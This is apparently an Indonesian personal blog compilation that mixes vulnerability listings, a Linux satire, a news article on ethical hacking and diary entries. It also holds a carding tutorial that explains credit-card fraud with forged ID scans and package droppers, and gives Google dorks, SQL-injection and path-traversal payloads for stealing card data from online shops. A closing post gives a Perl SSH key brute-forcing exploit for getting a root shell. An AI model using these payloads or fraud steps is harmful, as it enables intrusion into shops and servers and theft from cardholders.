Software : PHP Live! Chat
Version : v3.3
Vendor : http://www.phplivesupport.com/
Price : $49.95
Vulnerable : Remote SQL Injection
Google Dork : “Powered by PHP Live! v3.3″

Check this bug on : Here

Software : Game Server Component
Version : 1.0
Vendor : http://www.indianpulse.in/
License : GPL
Vulnerable : SQL Injection
Google Dork : inurl:”com_gameserver”

Check this bug on : Here

Software : DigiFolio Component
Version : 1.52
Vendor : http://www.uwix.nl/testcase/
License : GPL
Vulnerable : SQL Injection
Google Dork : inurl:”com_digifolio”

Check this bug on : Here

Software: Siirler Bileseni
Version : 1.2 RC (Legacy)
Vendor : http://www.qproje.com/
License : GNU/GPL

Check this bug on : Here

Microsoft untuk kemudahan hidup. Mungkin kamu berpikir “ah kalau gue iseng-iseng nyoba Linux, sekali aja..gue nggak bakal ketagihan!” kenyataan membuktikan bahwa Sekali kamu mencoba Linux, kamu bisa ketagihan seumur hidup. Jalan terbaik menghadapi godaan linux adalah dengan tidak mencobanya sama sekali. Sekali kamu ketagihan, efek ketagihannya secara kejiwaan tidak akan hilang seumur hidup. Sekali mencoba Linux, kamu terbelenggu seumur hidup.

Sudah terlalu banyak yang berawal dari coba-coba, menjadi ketagihan. Mungkin kamu berpikir bahwa nginstall Linux, bisa nolong gue mempelajari komputer!, kenyataan membuktikan bahwa Linux justru membuat komputer kelihatan lebih sulit ! Jalan terbaik menghadapi godaan linux adalah dengan tidak mencobanya sama sekali. Seorang pecandu Linux tidak dapat berfikir secara normal dalam hidupnya (apa yang ada disekitarnya akan dianggap gratis !!). Linux akan mengacaukan perasaan kamu, bahkan akan memberikan pengaruh yang merusak bagi ortu, pacar dan orang-orang yang kamu sayangi dan juga pengaruh buruk bagi microsoft. Seorang pecandu linux tidak mampu menghadapi kenyataan bahwa sebuah program dibuat dengan susah payah dan seorang programmer berhak mendapatkan kompensasi yang pantas atas jerih payahnya.

Mungkin ada yang berkata “kan nggak semua jenis Linux berbahaya !” semua jenis Linux berbahaya mulai dari RedHat, Mandrake, Suse, Trustix, Slackware dan variannya. Kesemuanya akan menyebabkan kamu menjadi Pusing-pusing (akibat zat kernel yang terdapat didalamnya), Kehilangan teman dan kehidupan sosial (akibat kelamaan nongkrong ngurusin linux), Delusi (zat open source yang terkandung didalamnya membuat kamu merasa punya hak untuk mengetahui rahasia apa saja), Pecandu Mozilla (Kamu akan menjadi fanatik dengan Mozilla dan menganggap IE tidak ada apa-apanya), PHP/Perl/MySQL Minded (kamu mulai tergiur dengan dunia internet programming dan melupakan ASP dan SQL Server), Apache Mania (kamu mulai ngefans dengan Apache Web Server dan secara perlahan meninggalkan IIS dan Personal Web Server), Mungkin kamu berpikir, Banyak orang keren dan selebrities/artis pake dan mendukung Linux, kenapa gue nggak nyoba ? kenyataan membuktikan bahwa Mereka-mereka (IBM,Sun,Oracle) itu mendukung dan menggunakan linux hanya untuk tujuan bisnis dan politik (menjatuhkan panglima tinggi Bill Gates). Selebrities/Artis yang menggunakan Linux dibayar, untuk memberikan kesan bahwa mereka mempunyai massa yang banyak.

Mereka-mereka itu adalah orang-orang yang tidak percaya diri dengan kekuatan mereka masing-masing, sehingga mereka sibuk menghimpun kekuatan bersama untuk menjatuhkan bill gates. Mungkin kamu berpikir, dengan menggunakan linux, kamu akan kelihatan jauh lebih hebat! kenyataan membuktikan bahwa Linux tidak saja memberikan kesan kamu lebih expert dalam menguasai komputer, akan tetapi juga memberikan kesan bahwa pengguna microsoft jauh lebih bodoh dari pengguna linux! Mungkin kamu berpikir, “Dengan menggunakan linux, kamu bisa terbebas dari dakwaan dan ancaman pelanggaran Hukum” kenyataan membuktikan bahwa pengguna Linux pun bisa dibawa ke pengadilan apabila terbukti bersalah melanggar hukum (jadi jelas tidak ada diskriminasi hukum antara pemakai linux dan pemakai non-linux).

Ciri-ciri pecandu linux :

1. Berat Badan tidak berubah
2. Pusing-pusing
3. Keranjingan nonton film Anti-Trust!
4. Membenci Billgates dan Microsoft
5. Pemuja Open Source
6. Kantong cekak
7. Mudah tersulut emosinya mendengar kata-kata “microsoft”.

Tips berkata tidak.

Kami memberikan beberapa tips agar kamu dapat mengatakan TIDAK terhadap godaan si Pinguin Linux. Siapkan dirimu untuk menghadapi berbagai tekanan yang ditawarkan teman-temanmu :

• Maaf, gue nggak mau!

• Sorry, gue nggak mau!

• Sorry ya, gue khan nggak pernah nyuruh elo make linux, jadi jangan suruh gue dong!

• Sorry ya, gue anak orang kaya, nggak biasa make barang gratisan!

Pengakuan

Kisah mantan pecandu Linux “hai nama gue Asal(19 tahun), gue adalah mantan pecandu linux, gue berkenalan dengan linux pada tahun 96, gue pertama kali nyoba slackware setelah ditawari temen-temen gue, abis itu gue mulai nyoba redhat dan suse, akhirnya gue kebablasan dan gue mulai kecanduan suse di awal tahun 1999. Pokoknya hari-hari gue selalu diisi dengan nyobain suse terus mulai dari install sampai coba-coba bikin aplikasi web programming, gue mulai ngelupaain dunia sekeliling gue, pacar/ortu dan pelajaran sekolah. Semuanya gue tinggallin demi linux suse, badan gue menggiggil kedinginan setiap musim hujan, setiap bangun tidur gue bingung antara mau install suse, makan pagi, bikin aplikasi, ke sekolah atau minta duit ke nyokap buat beli CD linux suse terbaru, pokoknya gue tiap pagi selalu dalam keadaan bingung!.

Nggak puas dengan linux suse, gue mulai kenalan dengan namanya kehidupan malam, diam-diam setiap malam gue pergi ke rumah teman gue yang mengadakan pesta linux bebas gila-gilaan !!! disana kita bebas nyobain linux suse dengan komputer tipe tercanggih dan hardware multi media lengkap, gue dan temen-temen mulai coba bikin animasi, musik dan sebagainya pake suse. Bahkan temen-temen gue yang cewe™ tanpa malu-malu memperlihatkan kecanggihannya bikin aplikasi internet pake software platform suse, wah canggih deh pokoknya.

Sampai akhirnya nyokap gue curiga melihat kelakuan gue dan pada suatu hari nyokap menggeladah kamar gue, dan menemukan CD dan komputer gue yang telah terinstall Linux. Gue dimarahin abis-abisan sama bokap dan nyokap, Bokap gue sampai ngamuk berat dan ngancurin semua koleksi CD linux gue. Gue dibawa ke psikiater trus gue dinasehati macam-macam seperti “dilarang anu, jangan itu, jangan begini dan sebagainya“, gue juga dibawa ke dokter untuk diperiksa darah gue apakah mengandung virus atau tidak, setelah diperika , ternyata benar apa yang gue khawatirkan, ternyata darah gue berwarna merah bukan berwarna biru seperti yang dibangga-banggakan oleh keluarga besar gue selama ini, gue harus menerima kenyataan bahwa ternyata gue bukan keturunan ningrat.

Nyokap dan bokap gue akhirnya sepakat membawa gue ke rumah sakit ketergantungan linux di daerah terpencil jawa barat, pada awalnya gue merasa tersiksa banget, nggak betah euy, setelah 6 bulan gue digembleng dan dipaksa untuk ambil sertifikat MCSE dan MCSD dari Microsoft, akhirnya gue sadar sendiri, bahwa memang selama ini gue salah. gue sekarang sudah tobat dan berjanji nggak mau janji-janji lagi. demikianlah cerita gue, semoga bisa diambil hikmahnya.

Hidup ini penuh dengan pilihan ,sebagian adalah pilihan benar sebagian lagi pilihan salah. Kita BEBAS menentukan arah hidup kita. Tapi ingat, menyangkut pilihan sistem operasi, hanya ada dua pilihan, yakni Susah dan Gampang. TOLAKLAH Linux, maka kamu akan menjadi pemenang dalam hidup ini. Pilih Linux – bersiaplah untuk tergantung seumur hidup, Pilihlah Microsoft untuk kemudahan hidup anda.

Yayasan Mie Crosoft Menuju Indonesia Bebas Linux !! Yayasan Mie Crosoft memahami bahwa untuk membebaskan remaja indonesia dari pengaruh sistem operasi liar adalah dengan cara menyadarkan dan membimbing mereka untuk menyadari keputusan yang diambilnya. Kegiatan dari yayasan Mie Crosoft adalah mengkampanyakekan hidup normal dan sehat bersama sistem operasi Windows family (Dos, win3.1, win95,win98,winMe,winXP,NT,2000)’,  Anggapan Umum Masyarakat Microsoft untuk kemudahan hidup.

Terserah mereka atau anda menganggap gw seperti apa, membandingkan diri gw dengan siapa dan mau jadi bagaimana dan mengapa, it’s not my bussines, dari hari ini dan entah hingga kapan, menikmati malam di malioboro dengan sebungkus roko putih, sharing, adu argumen dan bercanda bareng yogyacarderlink crew dengan 5 pitchers alcoholics fruit punch beralaskan tikar (lesehan), bulan² ini begitu menyenangkan, yeah im so exciting but if i say life’s beautiful, it just fucking bullshit

Berpikir tentang bagaimana masa depan dengan skill yg gw punya sekarang, terus berusaha, ga peduli gw hidup di kota yg mereka sebut urban dan bukan bertitle ibukota negara yg full of lifestyle, yg penting gw bisa tetap hidup, tetap online buat terus mencari ilmu pengetahuan dan info² terbaru tentang teknologi, berkreasi di dunia maya walopun mereka menganggap hal yg gw lakukan adalah negatif, tapi menurut gw itu udah cukup untuk sekarang walopun gw ga tau gimana selanjut’a, but this’s my life, this’s my way…

Hari² yg melelahkan udah gw lewatin dengan suka cita, bukan cuma masalah kecil dan besar, dengan membedakan apa yang ga bisa dan apa yang ga mau gw lakuin, bakal jadi lebih banyak hal yang bisa tercapai, thats all

Tetap ngejalanin hidup dengan senyum, berpikir pragmatis dan rasionalis mungkin akan lebih baik saat ini, 3 bulan ini bikin hidup gw jadi makin hidup dan jauh dari rasa keputusasaan, Seandainya benar mau berubah, gw rasa semua yang terjadi udah lebih dari cukup buat dijadiin pelajaran dan mulai berubah untuk jadi lebih baik.

Dikutip dari Kompas.com
Oleh Amir Sodikin

Pemilik rumah: Rumah saya dibobol maling, tolong pihak berwajib menindak pelakunya. Enggak ada yang dicolong, cuma saya malu karena tembok dicorat-coret.

Tertuduh: Saya enggak maling kok, cuma masuk halamannya saja. Saya corat-coret cuma untuk memperingatkan kalau pagar tidak dikunci.

Istilah hacker (yang baik) di Indonesia masih dirancukan dengan istilah cracker (yang jahat). Tak hanya itu, semua kegiatan yang bernuansa hacking juga dianggap haram oleh pemerintah. Padahal, “hacker putih” atau white hat hacker seharusnya dirangkul.

Tanpa disadari, potensi hacker Indonesia ternyata luar biasa. InfoKomputer, Kamis (12/6), menggelar event nasional bertajuk “Biggest Hacker’s Day Event in Indonesia”. Acara yang digelar bersamaan dengan Festival Komputer Indonesia 2008 di Jakarta Convention Center (JCC) ini ternyata banyak diminati. Ini membuktikan, keamanan web sudah menjadi bagian penting dunia kita.

Hacker sebenarnya untuk menyebut orang yang paham soal komputer, mulai software, hardware, arsitektur, hingga administrasinya. Tetapi, orang mengonotasikan hacker sebagai orang jahat yang membobol keamanan. Padahal, hacker hanya memperbaiki, mencari lubang keamanan, dan memberikan peringatan.

Tidak merusak

White hat hacker memiliki etika tidak merusak dan tidak mencuri data sensitif. Dari sisi positif, hacker ketika menemukan lubang keamanan hanya memberikan peringatan kepada pemilik web untuk meningkatkan keamanan. Jika sampai merusak, maka sebutan dia adalah cracker. Memang akhirnya muncul black hat hacker yang sering membobol sistem keamanan untuk kepentingan pribadi dan juga grey hat hacker yang menyuplai (menjual) informasi keamanan kepada vendor dan juga cracker.

“Tahun depan ada pemilu, kita harus membahas masalah keamanan web ini dari sisi positif. Hacker bisa menjadi mitra yang baik,” kata BM Adam, Pemimpin Redaksi InfoKomputer.

Pengamat masalah keamanan web, Anselmus Ricky, atau di dunia maya dikenal dengan nick Th0R, mengatakan, Indonesia punya banyak potensi orang hebat. Namun, masalah keamanan website masih menjadi kendala.

“Hacker’s Day ini terinspirasi dari forum di Amerika Serikat yang memfasilitasi berbagai pihak untuk membahas kasus-kasus baru soal keamanan. Ini bukan ajang kumpul hacker, tetapi juga membahas cyber law,” katanya.

Wakil Ketua Indonesia Security Incident Response Team on Internet Infrastrucure (ID-SIRTII) Muhammad Salahuddien mengatakan, banyak ancaman keamanan yang datang dari Indonesia. ”Tetapi kita sendiri masih lemah mengatasinya,” katanya.

Di forum-forum internasional, mereka sering mengeluhkan ancaman-ancaman itu yang datang dari Indonesia, mulai dari bentuk virus hingga serangan untuk membobol keamanan.

Kini mulai bermunculan forum dan workshop soal keamanan teknologi informasi. Beberapa di antaranya bahkan menghadirkan pembicara-pembicara yang masih SMA. Karena itu, ID-SIRTII berjanji akan membuat jadwal acara-acara seperti itu agar masyarakat bisa mengikutinya.

Potensi besar

Coordinator of ICT & IS Department Swiss German University-Asia, James Purnama, mengatakan, banyak fakta mengejutkan dari kegiatan cracking. Rata-rata dilakukan anak SMA dan mahasiswa. “Kita harus segera bisa menggandeng lembaga yang bisa memfasilitasi mereka, misalnya lembaga sertifikasi,” katanya.

Lembaga sertifikasi bisa memberikan sertifikasi hacker yang beretika. “Dengan cara ini, potensi mereka tak terbuang dan tak mengarah kriminal. Mereka akan menjadi penjaga server, bukan lagi penyerangnya,” katanya.

Tin Tin Hadijanto dari lembaga sertifikasi EC Council mengatakan, lembaganya kini mengeluarkan sertifikasi bagi hacker yang beretika. “Kami dari lembaga pendidikan, tugas kami membangun kesadaran soal keamanan dari level sederhana hingga level ahli,” kata Tin Tin.

“Hacker putih (whitehat)” jasanya bisa dipakai oleh perusahaan untuk menjaga server. Mereka bahkan bisa menjadi konsultan perusahaan-perusahaan untuk meningkatkan keamanan, membuat software, atau membuat sistem.

Ketua ID-SIRTII Richardus Eko Indrajit mengatakan, dari sisi sumber daya, Indonesia potensial menjadikan security management sebagai “brand” andalan lulusan sarjana Indonesia. “Dengan berbagai kompetisi hacker yang sering dimenangi Indonesia, kita bisa bilang: kalau mau cari ahli security, carilah lulusan Indonesia,” katanya.

Sudut pandang

Bagi pemilik web, pembobolan situs adalah peristiwa kriminal yang perlu dilaporkan polisi. Tetapi, sebenarnya, mengumumkan bahwa situsnya dibobol sebenarnya hal memalukan karena menunjukkan lemahnya pertahanan gara-gara “lupa mengunci pagar”.

Sudut pandang dunia cyber dari dunia nyata memang berbeda. Di dunia cyber, pembobolan situs yang disertai dengan meninggalkan jejak nama (misalnya Hacked by bla bla bla) justru akan membuka mata untuk meningkatkan keamanan.

Berterima kasihlah kepada mereka yang telah meng-hack situs Anda dengan santun. Perusahaan harus tahu bagaimana meningkatkan keamanan. Jadi, jangan hanya menyalahkan para pembobol web jika memang keamanan yang dimiliki jelek.

Ga perlu sebuah pembelaan untuk diri gw sendiri, silakan berargumen tentang apa yg pernah gw perbuat.

Ngomong sey emang gampang, tapi praktek’a itu butuh kesabaran, harus pinter ngomong, fasih berbahasa inggris dan untuk lo tau bahwa carding itu untung²an, jadi ngapain juga klo gw dapet barang bagus gw kasih ke lo, mendingan buat gw aja

pasti lo² semua yg sering nanya ke gw mo tau kan apa aja yg gw persiapkan sebelom melakukan carding, well… tanpa ada sedikitpun yg gw tutup²in terkecuali bagian bawah dari tubuh gw, sekarang gw kasih tau:

1. Credit Card number + cvv + expired (harus valid)
2. Proxy USA klo bisa
3. Virtual Phone Number (skype)
4. Virtual Address (klo di butuhkan)
5. Email khusus carding (yahoomail,gmail,hotmail,etc)
6. Seller
7. Dropper (biar barang lo cepet nyampe’a)
8. Roko Mild satu bungkus
9. Snack Potato Rasa Barbeque 5 Bungkus
10. Music Player (winamp,jet audio,amarok)

okay !! gw yakin lo pada nanya gimana cara dapetin proxy? nah di sini balik lagi dey lo sama yg nama’a webshell yg lo dapetin dari web yg mempunyai bug Remote File Inclusion, di sana lo bisa bikin proxy sendiri, tapi klo lo emang orang’a “MALES” mendingan lo balik lagi ke paman google, lo bisa cari situs² penyedia proxy gratis, tapi yaa gitu dey, ga awet, paling lama juga 1 jam udah mati.

Kedua tentang virtual phone number, tau skype kan ? itu loch yg buat voip (voice over internet protocol) nah lo bisa beli nomer telephone virtual dari USA melewati skype, trus fungsi’a buat apa ?? gw males jelasin’a mendingan lo join aja di chan #yogyacarderlink dan tanya² sama anak² yg ada di sana okay !!

Ketiga tentang virtual address, di sini lo beli alamat virtual di USA dan ada lembaga di sana yg ngurus barang² lo buat di kirim ke alamat asli lo, cuma proses pembelian’a agak susah, lo harus nunjukin credit card, license drive, ID card, visa, paspor, bingung gimana cara’a ? buat apa ada photoshop klo ga di gunain, hahahah, lagian dia kan cuma minta gambar hasil scan, jadi cari aja gambar²a di google trus edit dey di photoshop.

Keempat Email khusus, satu hal penting, jangan pernah ngirim orderan ke email lo yg biasa lo pake buat ngirim² pesan penting, jangan pernah lo campur aduk tu email, klo bisa lo bikin lagi email baru yg khusus buat carding, dan biasain pake logika lo, klo mo carding, nama email’a yg berhubungan dengan nama² orang USA sana, minimal lo dapet 1 point kecil penting lah untuk nama email ini.

Kelima lo harus punya seller or penjual yg kira² bisa shipping worldwide, silakan cari sendiri shop online di google yg bisa shipping worldwide dengan imajinasi kata² lo sendiri.

Keenam about Dropper, nah ini di butuhin klo emang kita dapet shop online yg ga nerima shipping worldwide, inti’a lo harus punya kenalan or koneksi di USA atau di Canada bahkan mungkin England yg bisa di ajak kerjasama, jadi begitu barang di kirim ke dropper, dia langsung ngirim ke alamat kita, jadi seandai’a lo beli laptop, jangan beli satu, tapi minimal dua, biar satu buat kita, satu buat dia, itu nama’a kerjasama kan ?? dan di situlah kerjaan dropper, mereka cuma ngedrop barang kita doank dan mereka dapet untung juga dari kita

and The Last, how to find valid credit card, here’s old bug but works

1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1

2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log

3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb

4. contoh bugs pada bentuk toko sistem CShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt

5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/
dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database
access.mdb sebaiknya pake ms access aja)

6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order…

7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
(karena untuk membaca database access.mdb sebaiknya pake ms access
aja)

8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah
dimodifikasi tadi, dengan format

http://www.xxxxx.com/cart32/

Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian
shopdisplayproducts.asp
Contoh :

http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%…,

fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password
admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp

11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com Ketik –> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb

12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=…&template…

13. contoh bugs pada bentuk toko sistem roddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/
vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb

14. contoh bugs pada bentuk toko sistem igishop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection

Usename : ‘or”=”
Password : ‘or”=”

well, menurut gw ini udah cukup menjelaskan bagaimana langkah² untuk melakukan carding, dan klo masih ada yg mo di tanyain lagi, silakan join aja di #yogycarderlink@Dal.net, cuz i dont wanna you ask to me on private messege again about carding !!

#yogyacarderlink@Dal.net cRew

Ga henti²a beliau mengeluarkan airmata, saat itu gw ga tau harus gimana lagi, ga mungkin lagi gw harus terus bertahan, mau gimanapun gw harus tetap pergi, dan hingga beliau bantuin gw packing baju, dia masih tetap menangis…

lagu dari No Use For A Name – Check For A Pulse masih terus terdengar dari speaker aktif komputer di playlist dan terus mengulang, 1 bungkus rokok mild masih tetap setia menemani gw di ruang makan sambil terus merenung dan menahan sedih. Ga ada lagi perasaan paling bersalah selain ketika nyokap gw menunggu dirumah menanti gw pulang dari jogja karena sakit parah yg gw derita waktu itu dan teryata gw ga kunjung datang, yg ada di jakarta gw malah nginep di suatu tempat, sumpah dan ga nyangka banget ketika beliau ngomong saat itu dia khawatir banget dan sering nangis gara² sakit yg gw derita, damn !! anak macam apa gw ini !!

09.50 pm terdengar suara mobil dari luar rumah, dan gw yakin banget itu pasti bokap gw, pulang dari kantor dengan wajah letih dan langsung mengajak gw ngobrol sebentar buat ngasih nasehat, ga terlihat perasaan sedih dari bokap gw, tapi raut wajah’a memperlihatkan rasa kehilangan yg sangat besar, ga pernah menitikan airmata di depan anak²a tapi gw tau hati beliau pasti menangis, papah yg galak yg gw kenal waktu gw masih sekolah dulu, tapi cukup bijaksana setelah gw lulus sekolah, yupz, that’s my dad and also my hero, maafin klo ga pernah jadi anak yg bisa bikin papah bangga

12.15 am gw siap² untuk berangkat ke jakarta, masih jelas terlihat nyokap yg terus mengusap airmata’a dengan sapu tangan, airmata’a tetap menetes ga berhenti², mata’a yg mulai keliatan membengkak karena terus²an nangis, titipan terakhir dari beliau sebelom gw pergi meninggalkan rumah adalah kain sarung dan sajadah, untuk terakhir kali’a dengan wajah senyum kehilangan dan beliau bilang dengan sedikit intonasi suara bercanda…

“yaaa ryan pergi ninggalin mamah dey… kamu jangan lupa sholat yach disana, mamah doain kamu dari sini biar jadi orang sukses, klo kamu ada waktu jangan lupa hubungin mamah, mamah pasti kangen kamu…” dan terakhir dia memeluk gw dengan erat dan mencium kening gw untuk ke 2x’a

21.06.08 – 13.45pm dari bandara soekarno-hatta cengkareng gw udah harus berangkat untuk waktu yg bener² cukup lama, mungkin ini adalah pelajaran buat gw sekaligus latihan mental buat gw untuk jauh dari orang tua, dan gw yakin entah kapan, gw ataupun orangtua gw pasti bakal ada yg pergi se’lama²a buat ninggalin salah satu dari keluarga gw, dan mungkin juga dengan gw jauh dari orangtua, membiayai diri sendiri dari hasil jerih payah gw sendiri, berjuang hidup sendiri tanpa meminta bantuan sedikitpun dari mereka, kelak hari esok gw akan menjadi seseorang yg lebih tegar ketika saat’a benar² tiba untuk mereka ninggalin gw dari dunia ini.

Dedicated For my Lovely parents

Here we Go !!

1. Download exploit’a dari sini
2. Extract ke dalam directory yg di tentukan
3. Masuk ke dalam /root/.ssh/authorized_keys lalu generated exploit SSH RSA key 2048 Bits tadi, exploit ini akan mem by-pass SSH key
4. Jalankan script perl dan arahkan pada lokasi dimana tempat lo extracted exploit tadi

#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print “Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n”;
print “Example: ./exploiter.pl /root/keys/ 127.0.0.1\n”;
print “By mm@deadbeef.de\n”;
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die(“opendir”);
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system(“echo “.join(” “, @a).”; ssh -l root “.join(” “, map { “-i
“.$_ } @a).” “.$ARGV[1]);
@a = ();
}
}

5. Bingo !! Nikmati Shell yg lo dapet kurang dalam waktu 20 menit